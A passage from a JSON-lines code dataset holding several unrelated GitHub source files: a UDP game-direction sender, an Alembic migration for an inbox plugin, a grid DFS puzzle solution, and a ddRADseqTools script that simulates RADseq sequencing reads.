render_template('info.html')\n","repo_name":"PavanTiwari/AMSProject","sub_path":"AMS/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8736359447","text":"from components.motion import Motion\nfrom components.player_info import PlayerInfo\nfrom engine.system import System\nimport socket\n\n\nclass SendDirectionDataSystem(System):\n\n def __init__(self, engine, host, port, client_player_number):\n self._engine = engine\n self._client_player_number = client_player_number\n self._host = host\n self._port = port\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self._elapsed_time = 0\n self._sending_interval = 40\n\n def start(self):\n pass\n\n def update(self, time):\n self._elapsed_time += time\n if self._elapsed_time >= self._sending_interval:\n self._elapsed_time -= self._sending_interval\n else:\n return\n\n players = self._engine.get_entity_by_group('player')\n\n for player in players:\n player_info = player.get(PlayerInfo)\n\n if player_info.number != self._client_player_number:\n continue\n\n player_motion = player.get(Motion)\n x = player_motion.x_velocity\n y = player_motion.y_velocity\n data = str(player_info.number) + '-'\n\n if x == 0 and y < 0:\n data += 'UP'\n elif x == 0 and y > 0:\n data += 'DOWN'\n elif x > 0 and y == 0:\n data += 'RIGHT'\n elif x < 0 and y == 0:\n data += 'LEFT'\n else:\n data += 'DIRECTION_ERROR'\n\n self._socket.sendto(data.encode(), (self._host, self._port))\n\n def end(self):\n pass\n\n","repo_name":"zyks/python-wars","sub_path":"systems/send_direction_data_system.py","file_name":"send_direction_data_system.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41787647006","text":"\"\"\"Added pluginName\n\nPeek Plugin Database Migration Script\n\nRevision ID: 7e6bd0411082\nRevises: deab93942032\nCreate Date: 2018-12-03 01:01:08.855992\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = \"7e6bd0411082\"\ndown_revision = \"deab93942032\"\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\nimport geoalchemy2\n\n\ndef upgrade():\n op.execute('TRUNCATE TABLE pl_inbox.\"Task\" CASCADE ')\n op.execute('TRUNCATE TABLE pl_inbox.\"Activity\" CASCADE ')\n\n op.drop_constraint(\n \"Activity_uniqueId_key\", \"Activity\", schema=\"pl_inbox\", type_=\"unique\"\n )\n op.add_column(\n \"Activity\",\n sa.Column(\"pluginName\", sa.String(), nullable=False),\n schema=\"pl_inbox\",\n )\n op.create_index(\n \"idx_Activity_pluginName_uniqueId\",\n \"Activity\",\n [\"pluginName\", \"uniqueId\"],\n unique=True,\n schema=\"pl_inbox\",\n )\n\n op.drop_constraint(\"Task_uniqueId_key\", \"Task\", schema=\"pl_inbox\", type_=\"unique\")\n op.add_column(\n \"Task\", sa.Column(\"pluginName\", sa.String(), nullable=False), schema=\"pl_inbox\"\n )\n op.create_index(\n \"idx_Task_pluginName_uniqueId\",\n \"Task\",\n [\"pluginName\", \"uniqueId\"],\n unique=True,\n schema=\"pl_inbox\",\n )\n\n\ndef downgrade():\n op.drop_index(\"idx_Task_pluginName_uniqueId\", table_name=\"Task\", schema=\"pl_inbox\")\n op.drop_column(\"Task\", \"pluginName\", schema=\"pl_inbox\")\n op.create_unique_constraint(\n \"Task_uniqueId_key\", \"Task\", [\"uniqueId\"], schema=\"pl_inbox\"\n )\n\n op.drop_index(\n \"idx_Activity_pluginName_uniqueId\", table_name=\"Activity\", schema=\"pl_inbox\"\n )\n op.drop_column(\"Activity\", \"pluginName\", schema=\"pl_inbox\")\n op.create_unique_constraint(\n \"Activity_uniqueId_key\", \"Activity\", [\"uniqueId\"], schema=\"pl_inbox\"\n )\n","repo_name":"Synerty/peek-plugin-inbox","sub_path":"peek_plugin_inbox/_private/alembic/versions/7e6bd0411082_added_pluginname.py","file_name":"7e6bd0411082_added_pluginname.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28528730978","text":"n = int(input())\n\nmatrix = [list(input()) for _ in range(n)]\nvisited = [[0]*n for _ in range(n)]\ncnt = 0\ndef DFS(x,y,color):\n stack = [(x,y)]\n dx = [0,0,-1,1]\n dy = [1,-1,0,0]\n\n while stack :\n\n node = stack.pop()\n x, y = node[0], node[1]\n visited[x][y] = 1\n\n for j in range(4):\n\n xx = x + dx[j]\n yy = y + dy[j]\n\n if 0 <= xx < n and 0 <= yy < n :\n if matrix[xx][yy] == color and visited[xx][yy] == 0 :\n stack.append((xx,yy))\n\n return 1\n\n\nfor i in range(n):\n for j in range(n):\n if matrix[i][j] in ['R','G','B'] and visited[i][j] == 0 :\n cnt += DFS(i,j,matrix[i][j])\n\nprint(cnt, end=\" \")\n\nvisited = [[0]*n for _ in range(n)]\n\nfor i in range(n):\n for j in range(n):\n value = matrix[i][j]\n if value =='R':\n matrix[i][j] = 'G'\n\n\ncnt = 0\nfor i in range(n):\n for j in range(n):\n if matrix[i][j] in ['G','B'] and visited[i][j] == 0 :\n cnt += DFS(i,j,matrix[i][j])\n\nprint(cnt)","repo_name":"su-ram/Problem-Solving","sub_path":"백준/BFS_DFS/적록색약.py","file_name":"적록색약.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43518616093","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#-------------------------------------------------------------------------------\n\n'''This software has been developed by:\n\n GI Genética, Fisiología e Historia Forestal\n Dpto. Sistemas y Recursos Naturales\n ETSI Montes, Forestal y del Medio Natural\n Universidad Politécnica de Madrid\n https://github.com/ggfhf/\n\n Licence: GNU General Public Licence Version 3\n'''\n\n#-------------------------------------------------------------------------------\n\n'''This source contains the program of the ddRADseqTools software package that\n builds a file in FASTA/FASTQ format with simulated reads of a double digest\n RADseq.\n'''\n#-------------------------------------------------------------------------------\n\nimport os.path\nimport random\nimport re\nimport sys\n\nfrom genlib import *\n\n#-------------------------------------------------------------------------------\n\ndef main(argv):\n '''Main line of the program.'''\n\n # build the options dictionary\n options_dict = build_options()\n\n # it has been requested the help or to build a new config file\n for param in argv:\n # show the help and exit OK\n if param.startswith('--help'):\n print_help(options_dict)\n sys.exit(0)\n # build the config file and exit OK\n elif param.startswith('--config'):\n build_config(options_dict)\n sys.exit(0)\n\n # get the config file\n config_file = get_config_file(__file__)\n\n # get options from the config file and the input parameters\n options_dict = get_options(options_dict, config_file, argv)\n\n # build the file with simulated reads\n build_reads(options_dict)\n\n#-------------------------------------------------------------------------------\n\ndef build_reads(options_dict):\n '''Build a file in FASTA/FASTQ format with reads gotten from a file containing a double digest RAD-seq fragments.'''\n\n fragsfile = options_dict['fragsfile']['value']\n technique = options_dict['technique']['value']\n format = options_dict['format']['value']\n readsfile = options_dict['readsfile']['value']\n readtype = options_dict['readtype']['value']\n rsfile = options_dict['rsfile']['value']\n enzyme1 = options_dict['enzyme1']['value']\n enzyme2 = options_dict['enzyme2']['value']\n endsfile = options_dict['endsfile']['value']\n index1len = options_dict['index1len']['value']\n index2len = options_dict['index2len']['value']\n dbrlen = options_dict['dbrlen']['value']\n wend = options_dict['wend']['value']\n cend = options_dict['cend']['value']\n individualsfile = options_dict['individualsfile']['value']\n locinum = options_dict['locinum']['value']\n readsnum = options_dict['readsnum']['value']\n minreadvar = options_dict['minreadvar']['value']\n maxreadvar = options_dict['maxreadvar']['value']\n insertlen = options_dict['insertlen']['value']\n mutprob = options_dict['mutprob']['value']\n locusmaxmut = options_dict['locusmaxmut']['value']\n indelprob = options_dict['indelprob']['value']\n maxindelsize = options_dict['maxindelsize']['value']\n dropout = options_dict['dropout']['value']\n pcrdupprob = options_dict['pcrdupprob']['value']\n pcrdistribution = options_dict['pcrdistribution']['value']\n multiparam = options_dict['multiparam']['value']\n poissonparam = options_dict['poissonparam']['value']\n gcfactor = options_dict['gcfactor']['value']\n verbose = options_dict['verbose']['value']\n trace = options_dict['trace']['value']\n\n # set the verbose and trace status\n if verbose.upper() == 'YES':\n Message.set_verbose_status(True)\n else:\n Message.set_verbose_status(False)\n if trace.upper() == 'YES':\n Message.set_trace_status(True)\n else:\n Message.set_trace_status(False)\n\n # assign the symbol of the indexes and the DBR\n (index1_symbol, index2_symbol, dbr_symbol) = get_symbols()\n\n # get the restriction site sequences\n (ressite1_seq, ressite1_lcut_seq, ressite1_rcut_seq, ressite2_seq, ressite2_lcut_seq, ressite2_rcut_seq) = get_ressites(rsfile, enzyme1, enzyme2)\n Message.print('trace', 'ressite1_seq: {0} - ressite1_lcut_seq: {1} - ressite1_rcut_seq: {2}'.format(ressite1_seq, ressite1_lcut_seq, ressite1_rcut_seq))\n Message.print('trace', 'ressite2_seq: {0} - ressite2_lcut_seq: {1} - ressite2_rcut_seq: {2}'.format(ressite2_seq, ressite2_lcut_seq, ressite2_rcut_seq))\n\n # verify that the sequences of the restriction sites are different (double digest)\n if ressite1_seq.upper() == ressite2_seq.upper():\n raise ProgramError('L006', ressite1_seq.upper())\n\n # get the length of the restriction sites and the cut restriction sites\n ressite1_len = len(ressite1_seq)\n cut_ressite1_len = max(len(ressite1_lcut_seq), len(ressite1_rcut_seq))\n ressite2_len = len(ressite2_seq)\n cut_ressite2_len = max(len(ressite2_lcut_seq), len(ressite2_rcut_seq))\n Message.print('trace', 'ressite1_len: {0} - cut_ressite1_len: {1} - ressite2_len: {2} - cut_ressite2_len: {3}'.format(ressite1_len, cut_ressite1_len, ressite2_len, cut_ressite2_len))\n\n # get the list of unambiguous restriction site sequences corresponding to each enzyme\n unambiguous_ressite1_seq_list = get_unambiguous_sequence_list(ressite1_seq.upper())\n unambiguous_ressite2_seq_list = get_unambiguous_sequence_list(ressite2_seq.upper())\n Message.print('trace', 'unambiguous_ressite1_seq_list: {0}'.format(unambiguous_ressite1_seq_list))\n Message.print('trace', 'unambiguous_ressite2_seq_list: {0}'.format(unambiguous_ressite2_seq_list))\n\n # get the restriction overhang sequences\n if len(ressite1_lcut_seq) >= len(ressite1_rcut_seq):\n resoverhang1_seq = get_reverse_complementary_sequence(ressite1_lcut_seq)\n else:\n resoverhang1_seq = ressite1_rcut_seq\n if len(ressite2_lcut_seq) >= len(ressite2_rcut_seq):\n resoverhang2_seq = ressite1_lcut_seq\n else:\n resoverhang2_seq = get_reverse_complementary_sequence(ressite2_rcut_seq)\n Message.print('trace', 'resoverhang1_seq: {0} - resoverhang2_seq: {1}'.format(resoverhang1_seq, resoverhang2_seq))\n\n # get the length of the restriction overhangs\n resoverhang1_len = len(resoverhang1_seq)\n resoverhang2_len = len(resoverhang2_seq)\n Message.print('trace', 'resoverhang1_len: {0} - resoverhang2_len: {1}'.format(resoverhang1_len, resoverhang2_len))\n\n # get the list of unambiguous restriction overhang sequences corresponding to each enzyme\n unambiguous_resoverhang1_seq_list = get_unambiguous_sequence_list(resoverhang1_seq.upper())\n unambiguous_resoverhang2_seq_list = get_unambiguous_sequence_list(resoverhang2_seq.upper())\n Message.print('trace', 'unambiguous_resoverhang1_seq_list: {0}'.format(unambiguous_resoverhang1_seq_list))\n Message.print('trace', 'unambiguous_resoverhang2_seq_list: {0}'.format(unambiguous_resoverhang2_seq_list))\n\n # get the end sequences and the DBR strand\n (wend_seq, cend_seq, dbr_strand) = get_ends(endsfile, wend, cend, technique, index1len, index1_symbol, index2len, index2_symbol, dbrlen, dbr_symbol)\n Message.print('trace', 'wend_seq: {0}'.format(wend_seq))\n Message.print('trace', 'cend_seq: {0}'.format(cend_seq))\n Message.print('trace', 'dbr_strand: {0}'.format(dbr_strand))\n\n # get the individuals dictionary\n individuals_dict = get_individuals(individualsfile, technique)\n individuals_num = len(individuals_dict)\n Message.print('trace', 'Individuals num: {0}'.format(individuals_num))\n Message.print('trace', 'individuals_dict: {0}'.format(individuals_dict))\n\n # get the individuals keys list\n individual_keys_list = get_individual_keys(individuals_dict)\n\n # get the GC distribution list\n GC_distribution_file = os.path.splitext(fragsfile)[0] + '-GC-distribution.csv'\n GC_distribution_list = get_GC_distribution(GC_distribution_file)\n\n # get the fragments list\n fragments_list = get_fragments_list(fragsfile)\n\n # open the output file(s)\n extention = '.fasta' if format == 'FASTA' else '.fastq'\n if readtype == 'SE':\n readsfile1 = readsfile + extention\n elif readtype == 'PE':\n readsfile1 = readsfile + '-1' + extention\n readsfile2 = readsfile + '-2' + extention\n try:\n readsfile1_id = open(readsfile1, mode='w', encoding='iso-8859-1')\n except:\n raise ProgramError('F002', readsfile1)\n if readtype == 'PE':\n try:\n readsfile2_id = open(readsfile2, mode='w', encoding='iso-8859-1')\n except:\n raise ProgramError('F002', readsfile2)\n\n # initialize the count of loci\n loci_count = 0\n\n # initialize the count of total reads\n total_reads_count = 0\n\n # for fragments in fragments_lis\n for data_fragment in fragments_list:\n\n # assing fragment data\n fragment_num = data_fragment[0]\n GC_rate = data_fragment[1]\n fragment_seq = data_fragment[2]\n order = data_fragment[3]\n Message.print('trace', 'order: {0} - fragment_num: {1}'.format(order, fragment_num))\n\n # verify the restriction overhang sequences of the locus fragment\n if fragment_seq[:resoverhang1_len].upper() not in unambiguous_resoverhang1_seq_list:\n raise ProgramError('D304', enzyme1, \"5'\", fragment_num)\n if fragment_seq[(len(fragment_seq) - resoverhang2_len):].upper() not in unambiguous_resoverhang2_seq_list:\n raise ProgramError('D304', enzyme2, \"3'\", fragment_num)\n\n # get the unambiguous sequences corresponding to each restriction site\n unambiguous_resoverhang1_seq = fragment_seq[:resoverhang1_len]\n unambiguous_resoverhang2_seq = fragment_seq[(len(fragment_seq) - resoverhang2_len):]\n Message.print('trace', 'unambiguous_resoverhang1_seq: {0} - unambiguous_resoverhang2_seq: {1}'.format(unambiguous_resoverhang1_seq, unambiguous_resoverhang2_seq))\n\n # get the sequence of the locus fragment\n fragment_seq = fragment_seq[resoverhang1_len:(len(fragment_seq) - resoverhang2_len)]\n Message.print('trace', 'fragment_seq: {0}'.format(fragment_seq))\n\n # control the fragment sequence lenght is greater o equal to insertlen\n if len(fragment_seq) < insertlen:\n continue\n\n # add 1 to the count of loci\n loci_count += 1\n\n # determine if there are PCR duplicates\n pcrdup = arethere_pcrdup(pcrdupprob, GC_rate, GC_distribution_list, gcfactor)\n\n # there are mutations, get the mutations number and a list with mutated sequences of locus fragment\n if mutprob > 0:\n\n # assign the maximum mutated sequences number (usually 1)\n max_mutated_seq_num = 1 # always 1 in this version\n\n # get the mutations number (between 1 and the maximum mutated sequences number)\n mutated_seq_num = random.randrange(1, max_mutated_seq_num + 1)\n Message.print('trace', 'The fragment of locus {0} has {1} mutation(s) sequence(s).'.format(loci_count, mutated_seq_num))\n\n # initialize the fragment sequences list\n mutated_seqs_list = []\n\n # append mutated sequences\n for i in range(mutated_seq_num):\n # -- mutated_seq = mutate_sequence(fragment_seq, indelprob, maxindelsize, locusmaxmut, (resoverhang1_len + len(fragment_seq) + resoverhang2_len), unambiguous_ressite1_seq_list, unambiguous_ressite2_seq_list)\n mutated_seq = mutate_sequence(fragment_seq, indelprob, maxindelsize, locusmaxmut, (insertlen - resoverhang1_len - resoverhang2_len), unambiguous_ressite1_seq_list, unambiguous_ressite2_seq_list)\n mutated_seqs_list.append(mutated_seq)\n Message.print('trace', ' Original sequence : {0}'.format(fragment_seq))\n Message.print('trace', ' Mutated sequence {0} : {1}'.format(i, mutated_seqs_list[i]))\n Message.print('trace', ' _123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789_123456789')\n\n # assign data of both alleles\n for individual_key in individual_keys_list:\n if individuals_dict[individual_key]['replicated_individual_id'].upper() == 'NONE':\n\n # allele 1\n if mutprob > random.random():\n random_num = random.randrange(0, max_mutated_seq_num)\n individuals_dict[individual_key]['allele1_seq'] = mutated_seqs_list[random_num]\n individuals_dict[individual_key]['allele1_ismutated'] = True\n individuals_dict[individual_key]['allele1_probability'] = random.uniform(0.25, 0.75)\n else:\n individuals_dict[individual_key]['allele1_seq'] = fragment_seq\n individuals_dict[individual_key]['allele1_ismutated'] = False\n individuals_dict[individual_key]['allele1_probability'] = random.uniform(0.25, 0.75)\n if dropout > random.random():\n individuals_dict[individual_key]['allele1_isthere_dropout'] = True\n else:\n individuals_dict[individual_key]['allele1_isthere_dropout'] = False\n\n # allele 2\n if mutprob > random.random():\n random_num = random.randrange(0, max_mutated_seq_num)\n individuals_dict[individual_key]['allele2_seq'] = mutated_seqs_list[random_num]\n individuals_dict[individual_key]['allele2_ismutated'] = True\n else:\n individuals_dict[individual_key]['allele2_seq'] = fragment_seq\n individuals_dict[individual_key]['allele2_ismutated'] = False\n if dropout > random.random():\n individuals_dict[individual_key]['allele2_isthere_dropout'] = True\n else:\n individuals_dict[individual_key]['allele2_isthere_dropout'] = False\n\n # assign the sequences of replicated individuals\n for individual_key in individual_keys_list:\n replicated_individual_id = individuals_dict[individual_key]['replicated_individual_id']\n if replicated_individual_id.upper() != 'NONE':\n for individual_key2, individual_data2 in individuals_dict.items():\n if individual_data2['individual_id'] == replicated_individual_id:\n individuals_dict[individual_key]['allele1_seq'] = individuals_dict[individual_key2]['allele1_seq']\n individuals_dict[individual_key]['allele1_ismutated'] = individuals_dict[individual_key2]['allele1_ismutated']\n individuals_dict[individual_key]['allele1_probability'] = individuals_dict[individual_key2]['allele1_probability']\n individuals_dict[individual_key]['allele1_isthere_dropout'] = individuals_dict[individual_key2]['allele1_isthere_dropout']\n individuals_dict[individual_key]['allele2_seq'] = individuals_dict[individual_key2]['allele2_seq']\n individuals_dict[individual_key]['allele2_ismutated'] = individuals_dict[individual_key2]['allele2_ismutated']\n individuals_dict[individual_key]['allele2_isthere_dropout'] = individuals_dict[individual_key2]['allele2_isthere_dropout']\n break\n\n # there are not mutations\n else:\n\n # assign the locus sequence to both alleles\n for individual_key in individual_keys_list:\n individuals_dict[individual_key]['allele1_seq'] = fragment_seq\n individuals_dict[individual_key]['allele1_ismutated'] = False\n individuals_dict[individual_key]['allele1_isthere_dropout'] = False\n individuals_dict[individual_key]['allele1_probability'] = 1\n individuals_dict[individual_key]['allele2_seq'] = fragment_seq\n individuals_dict[individual_key]['allele2_ismutated'] = False\n individuals_dict[individual_key]['allele2_isthere_dropout'] = False\n\n # calculate reads number of this locus\n locus_reads_num = calculate_locus_reads_number(readsnum, minreadvar, maxreadvar, locinum)\n\n # initialize the locus reads count\n locus_reads_count = 0\n\n #for locus_reads_count in range(1, locus_reads_num + 1):\n while (True):\n\n # get the indivual key of this read\n while True:\n individual_key = individual_keys_list[random.randrange(0, individuals_num)]\n random_number = random.random()\n if individuals_dict[individual_key]['allele1_probability'] > random_number:\n if not individuals_dict[individual_key]['allele1_isthere_dropout']:\n allele = 1\n break\n else:\n if not individuals_dict[individual_key]['allele2_isthere_dropout']:\n allele = 2\n break\n\n # get data of the individual\n individual_id = individuals_dict[individual_key]['individual_id']\n individual_index1_seq = individuals_dict[individual_key]['index1_seq']\n individual_index2_seq = individuals_dict[individual_key]['index2_seq']\n individual_allele1_probability = individuals_dict[individual_key]['allele1_probability']\n if allele == 1:\n individual_allele_seq = individuals_dict[individual_key]['allele1_seq']\n individual_allele_ismutated = individuals_dict[individual_key]['allele1_ismutated']\n Message.print('trace', ' Individual: {0:11} - Prob. allele 1: {1:5f} - Random number: {2:5f} - 1er allele - is mutated?: {3:5} - seq: {4}'.format(individual_id, individual_allele1_probability, random_number, 'True' if individual_allele_ismutated else 'False', individual_allele_seq))\n else:\n individual_allele_seq = individuals_dict[individual_key]['allele2_seq']\n individual_allele_ismutated = individuals_dict[individual_key]['allele2_ismutated']\n Message.print('trace', ' Individual: {0:11} - Prob. allele 2: {1:5f} - Random number: {2:5f} - 2nd allele - is mutated?: {3:5} - seq: {4}'.format(individual_id, (1 - individual_allele1_probability), random_number, 'True' if individual_allele_ismutated else 'False', individual_allele_seq))\n\n # attach the index1 in the 5' end sequence of the Watson strand\n merged_wend_seq = merge_sequence(wend_seq, index1_symbol * index1len, individual_index1_seq)\n\n # attach the index2 in the 5' end sequence of the Crick strand\n if technique in ['IND1', 'IND1_DBR']:\n merged_cend_seq = cend_seq\n elif technique in ['IND1_IND2', 'IND1_IND2_DBR']:\n merged_cend_seq = merge_sequence(cend_seq, index2_symbol * index2len, individual_index2_seq)\n\n # get the degenerate nucleotides to indentify the PCR duplicates and attach it at the end sequence of Crick strand\n if technique in ['IND1', 'IND1_IND2']:\n pass\n elif technique in ['IND1_DBR', 'IND1_IND2_DBR']:\n dbr_seq = generate_sequence(dbrlen).lower()\n if dbr_strand == 'WEND':\n merged_wend_seq = merge_sequence(merged_wend_seq, dbr_symbol * dbrlen, dbr_seq)\n elif dbr_strand == 'CEND':\n merged_cend_seq = merge_sequence(merged_cend_seq, dbr_symbol * dbrlen, dbr_seq)\n\n # build the complete read sequence of the Watson strand\n watson_strand_seq = merged_wend_seq + unambiguous_resoverhang1_seq + individual_allele_seq[:insertlen - resoverhang1_len:]\n Message.print('trace', 'watson_strand_seq: {0}'.format(watson_strand_seq))\n\n # if readtype is PE, build the complete read sequence of the Crick strand\n if readtype == 'PE':\n crick_strand_seq = merged_cend_seq + get_reverse_complementary_sequence(unambiguous_resoverhang2_seq) + get_reverse_complementary_sequence(individual_allele_seq)[:insertlen - resoverhang2_len]\n Message.print('trace', 'crick_strand_seq: {0}'.format(crick_strand_seq))\n\n # get the PCR duplicates number\n pcrdup_num = calculate_pcrdup_num(pcrdup, pcrdistribution, multiparam, poissonparam)\n\n # write the records and its possible PCR duplicates\n for i in range(pcrdup_num + 1):\n\n # add 1 to the count of total reads\n total_reads_count += 1\n\n # add 1 to the locus reads count\n locus_reads_count += 1\n\n # write the record of watson strand sequence and its possible PCR duplicates records in the second output file\n if format == 'FASTA':\n readsfile1_id.write('>read: {0} | locus: {1} | read in locus: {2} | fragment: {3} | mutated: {4} | individual: {5} | index1: {6} | index2: {7}\\n'.format(total_reads_count, loci_count, locus_reads_count, fragment_num, individual_allele_ismutated, individual_id, individual_index1_seq, individual_index2_seq))\n readsfile1_id.write('{0}\\n'.format(watson_strand_seq))\n elif format == 'FASTQ':\n readsfile1_id.write('@read: {0} | locus: {1} | read in locus: {2} | fragment: {3} | mutated: {4} | individual: {5} | index1: {6} | index2: {7}\\n'.format(total_reads_count, loci_count, locus_reads_count, fragment_num, individual_allele_ismutated, individual_id, individual_index1_seq, individual_index2_seq))\n readsfile1_id.write('{0}\\n'.format(watson_strand_seq))\n readsfile1_id.write('+\\n')\n quality = generate_quality(len(watson_strand_seq))\n readsfile1_id.write('{0}\\n'.format(quality))\n\n # if readtype is PE, write record in the second output file with the reversed complementary sequence\n if readtype == 'PE':\n\n # write the record of crick strand sequence and its possible PCR duplicates records in the second output file\n if format == 'FASTA':\n readsfile2_id.write('>read: {0} | locus: {1} | read in locus: {2} | fragment: {3} | mutated: {4} | individual: {5} | index1: {6} | index2: {7}\\n'.format(total_reads_count, loci_count, locus_reads_count, fragment_num, individual_allele_ismutated, individual_id, individual_index1_seq, individual_index2_seq))\n readsfile2_id.write('{0}\\n'.format(crick_strand_seq))\n elif format == 'FASTQ':\n readsfile2_id.write('@read: {0} | locus: {1} | read in locus: {2} | fragment: {3} | mutated: {4} | individual: {5} | index1: {6} | index2: {7}\\n'.format(total_reads_count, loci_count, locus_reads_count, fragment_num, individual_allele_ismutated, individual_id, individual_index1_seq, individual_index2_seq))\n readsfile2_id.write('{0}\\n'.format(crick_strand_seq))\n readsfile2_id.write('+\\n')\n quality = generate_quality(len(crick_strand_seq))\n readsfile2_id.write('{0}\\n'.format(quality))\n\n # notify the reads have been written\n Message.print('verbose', '\\rSimulated sequences reads written: {0:9d}'.format(total_reads_count))\n\n # exit of for i when the readsnum has been achieved\n if total_reads_count >= readsnum:\n break\n\n # exit of for i when the reads number of this locus has been achieved\n if locus_reads_count >= locus_reads_num:\n break\n\n # exit of while True when the readsnum has been achieved\n if total_reads_count >= readsnum:\n break\n\n # exit of while True when the reads number of this locus has been achieved\n if locus_reads_count >= locus_reads_num:\n break\n\n # exit of for data_fragments when the readsnum has been achieved\n if total_reads_count >= readsnum:\n break\n\n # close reads files\n readsfile1_id.close()\n if readtype == 'PE':\n readsfile2_id.close()\n\n # show OK message \n Message.print('verbose', '\\n')\n if readtype == 'SE':\n Message.print('info', 'The file {0} containing the simulated sequences is created.'.format(get_file_name(readsfile1)))\n elif readtype == 'PE':\n Message.print('info', 'The files {0} and {1} containing the simulated sequences are created.'.format(get_file_name(readsfile1), get_file_name(readsfile2)))\n\n#-------------------------------------------------------------------------------\n\ndef build_options():\n '''Build a dictionary with the program options.'''\n\n # get all options dictionary\n all_options_dict = get_all_options_dict()\n\n # define the options dictionary\n options_dict = {\n 'fragsfile': all_options_dict['fragsfile'],\n 'technique': all_options_dict['technique'],\n 'format': all_options_dict['format'],\n 'readsfile': all_options_dict['readsfile'],\n 'readtype': all_options_dict['readtype'],\n 'rsfile': all_options_dict['rsfile'],\n 'enzyme1': all_options_dict['enzyme1'],\n 'enzyme2': all_options_dict['enzyme2'],\n 'endsfile': all_options_dict['endsfile'],\n 'index1len': all_options_dict['index1len'],\n 'index2len': all_options_dict['index2len'],\n 'dbrlen': all_options_dict['dbrlen'],\n 'wend': all_options_dict['wend'],\n 'cend': all_options_dict['cend'],\n 'individualsfile': all_options_dict['individualsfile'],\n 'locinum': all_options_dict['locinum'],\n 'readsnum': all_options_dict['readsnum'],\n 'minreadvar': all_options_dict['minreadvar'],\n 'maxreadvar': all_options_dict['maxreadvar'],\n 'insertlen': all_options_dict['insertlen'],\n 'mutprob': all_options_dict['mutprob'],\n 'locusmaxmut': all_options_dict['locusmaxmut'],\n 'indelprob': all_options_dict['indelprob'],\n 'maxindelsize': all_options_dict['maxindelsize'],\n 'dropout': all_options_dict['dropout'],\n 'pcrdupprob': all_options_dict['pcrdupprob'],\n 'pcrdistribution': all_options_dict['pcrdistribution'],\n 'multiparam': all_options_dict['multiparam'],\n 'poissonparam': all_options_dict['poissonparam'],\n 'gcfactor': all_options_dict['gcfactor'],\n 'verbose': all_options_dict['verbose'],\n 'trace': all_options_dict['trace']\n }\n\n # return the options dictionary\n return options_dict\n\n#-------------------------------------------------------------------------------\n\ndef print_help(options_dict):\n '''Print the program help.'''\n\n # get general data\n project_name = get_project_name()\n project_version = get_project_version()\n program_file = get_file_name(__file__)\n config_file = get_config_file(__file__)\n\n # print the help\n Message.print('info', '')\n Message.print('info', '{0} version {1}'.format(project_name, project_version))\n Message.print('info', '')\n Message.print('info', '{0} builds a file in FASTA/FASTQ format with simulated reads of a double digest RADseq.'.format(program_file))\n Message.print('info', '')\n Message.print('info', 'Usage: {0} --help'.format(program_file))\n Message.print('info', '')\n Message.print('info', ' Show the help of {0}.'.format(program_file))\n Message.print('info', '')\n Message.print('info', ' or: {0} --config'.format(program_file))\n Message.print('info', '')\n Message.print('info', ' Create the config file {0} with the default value of the options.'.format(config_file))\n Message.print('info', ' The default value of the options can be modified.'.format(config_file))\n Message.print('info', '')\n Message.print('info', ' or: {0} [--option= [--option=, ...]]'.format(program_file))\n Message.print('info', '')\n Message.print('info', ' The options values are read from the config file {0}, but they can be modified'.format(config_file))\n Message.print('info', ' in command line. The options are:')\n Message.print('info', '')\n Message.print('info', ' {0:18} {1}'.format('option', 'value'))\n Message.print('info', ' {0:18} {1}'.format('=' * 14, '=' * 78))\n Message.print('info', ' {0:18} {1}'.format('--fragsfile', options_dict['fragsfile']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--technique', options_dict['technique']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--format', options_dict['format']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--readsfile', options_dict['readsfile']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--readtype', options_dict['readtype']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--rsfile', options_dict['rsfile']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--enzyme1', options_dict['enzyme1']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--enzyme2', options_dict['enzyme2']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--endsfile', options_dict['endsfile']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--index1len', options_dict['index1len']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--index2len', options_dict['index2len']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--dbrlen', options_dict['dbrlen']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--wend', options_dict['wend']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--cend', options_dict['cend']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--individualsfile', options_dict['individualsfile']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--locinum', options_dict['locinum']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--readsnum', options_dict['readsnum']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--minreadvar', options_dict['minreadvar']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--maxreadvar', options_dict['maxreadvar']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--insertlen', options_dict['insertlen']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--mutprob', options_dict['mutprob']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--locusmaxmut', options_dict['locusmaxmut']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--indelprob', options_dict['indelprob']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--maxindelsize', options_dict['maxindelsize']['comment']))\n Message.print('info', ' {0:18} {1}'.format('--dropout', options_dict['dropout']['comment']))\n Message.print('info', 